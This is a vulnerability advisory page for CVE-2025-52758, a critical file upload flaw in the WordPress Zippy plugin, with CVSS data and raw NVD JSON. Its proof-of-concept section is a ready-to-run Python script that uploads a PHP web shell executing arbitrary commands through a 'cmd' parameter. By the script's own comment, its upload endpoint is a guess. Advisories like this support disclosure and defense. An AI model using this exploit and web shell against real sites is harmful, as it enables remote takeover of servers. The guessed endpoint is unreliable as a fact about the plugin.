Security Vulnerability Report
中文
CVE-2025-52758 CVSS 9.1 CRITICAL

CVE-2025-52758

Published: 2025-10-22 15:15:46
Last Modified: 2026-04-27 17:16:27

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Gesundheit Bewegt GmbH Zippy zippy allows Using Malicious Files.This issue affects Zippy: from n/a through <= 1.7.0.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zippy插件 <= 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-52758 PoC - WordPress Zippy Plugin Arbitrary File Upload # Target: WordPress site with Zippy plugin <= 1.7.0 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Create malicious PHP file for web shell php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Prepare the exploit files = { 'file': ('shell.php', php_payload, 'application/x-php') } # Upload endpoint (typical WordPress plugin upload endpoint) upload_url = f"{target_url}/wp-content/plugins/zippy/async-upload.php" try: print(f"[*] Attempting to upload malicious file to {target_url}") print(f"[*] Target: {upload_url}") # Send malicious file upload request response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: print("[+] File upload successful!") print(f"[+] Check uploaded shell at: {target_url}/wp-content/uploads/zippy/shell.php?cmd=whoami") else: print(f"[-] Upload failed with status code: {response.status_code}") print(f"[-] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Note: Modify upload_url based on actual plugin endpoint discovery

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52758", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:45.813", "lastModified": "2026-04-27T17:16:26.957", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Gesundheit Bewegt GmbH Zippy zippy allows Using Malicious Files.This issue affects Zippy: from n/a through <= 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/zippy/vulnerability/wordpress-zippy-plugin-1-7-0-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}